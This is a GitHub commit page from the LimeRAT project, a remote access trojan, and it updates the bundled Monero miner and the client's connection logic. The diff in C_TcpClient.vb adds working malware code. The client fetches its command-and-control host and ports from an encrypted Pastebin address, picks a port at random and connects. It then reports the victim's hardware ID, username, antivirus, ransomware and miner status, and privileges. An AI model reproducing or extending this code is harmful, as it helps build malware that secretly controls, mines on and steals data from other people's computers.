Skip to content
This repository was archived by the owner on Jun 25, 2019. It is now read-only.

Commit 19710ea

Browse files
committed
UPDATE v0.1.8.5C
*Updated XMR miner (v2.8.3) *Updated multi port -> example pastebin "127.0.0.1:8989:7878:5656"
1 parent f7b4870 commit 19710ea

File tree

16 files changed

+46
-32
lines changed

16 files changed

+46
-32
lines changed
0 Bytes
Binary file not shown.

.vs/LimeRAT/v15/.suo

0 Bytes
Binary file not shown.
0 Bytes
Binary file not shown.
0 Bytes
Binary file not shown.
0 Bytes
Binary file not shown.

Project/Client/C_Main.vb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
'##################################################################
2-
'## N Y A N C A T ||| Updated on Sept/25/2018 ##
2+
'## N Y A N C A T ||| Updated on Oct./20/2018 ##
33
'##################################################################
44
'## ##
55
'## ##

Project/Client/C_TcpClient.vb

Lines changed: 12 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,6 @@
1-
Namespace Lime
1+
Imports System.Collections.Generic
2+
3+
Namespace Lime
24

35
Public Class C_TcpClient
46
Public Shared ENDOF As String = C_Settings.ENDOF
@@ -10,6 +12,7 @@
1012
Public Shared MS As IO.MemoryStream = Nothing
1113
Public Shared Tick As System.Threading.Timer = Nothing
1214
Public Shared KA As Integer = 0
15+
Public Shared P As New List(Of Integer)
1316

1417
Public Shared Sub Connect()
1518

@@ -93,24 +96,29 @@ re:
9396
C_Settings.HOST = "127.0.0.1"
9497
C_Settings.PORT = 8989
9598
#Else
99+
96100
Using WC As New Net.WebClient 'Pastebin, split by ":" IP:PORT
97101
Try
98102
Dim myCredentials As New Net.NetworkCredential("", "")
99103
WC.Credentials = myCredentials
100104
Dim Response As String = WC.DownloadString(C_Encryption.AES_Decrypt(C_Settings.Pastebin))
101-
C_Settings.HOST = Response.Split(":")(0)
102-
C_Settings.PORT = Response.Split(":")(1)
105+
' Dim Response As String = WC.DownloadString((C_Settings.Pastebin))
106+
Dim SPL = Split(Response, ":")
107+
C_Settings.HOST = SPL(0)
108+
Dim r As New Random
109+
C_Settings.PORT = SPL(New Random().Next(1, SPL.Length))
103110
WC.Dispose()
104111
Catch ex As Exception
105112
End Try
106113
End Using
107114

108115
#End If
116+
109117
C.Connect(C_Settings.HOST, C_Settings.PORT)
110118
Alive = True
111119
MS = New IO.MemoryStream
112120

113-
Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.5B", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
121+
Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.5C", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
114122
C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.XMR, SPL, C_ID.USBSP, SPL, C_Settings.PORT, SPL, C_ID.dotNET, SPL, "...", SPL, " ", SPL,
115123
C_ID.Privileges.ToString, SPL, C_Settings.fullpath))
116124

0 Bytes
Binary file not shown.
7 Bytes
Binary file not shown.
-437 KB
Binary file not shown.

0 commit comments

Comments
 (0)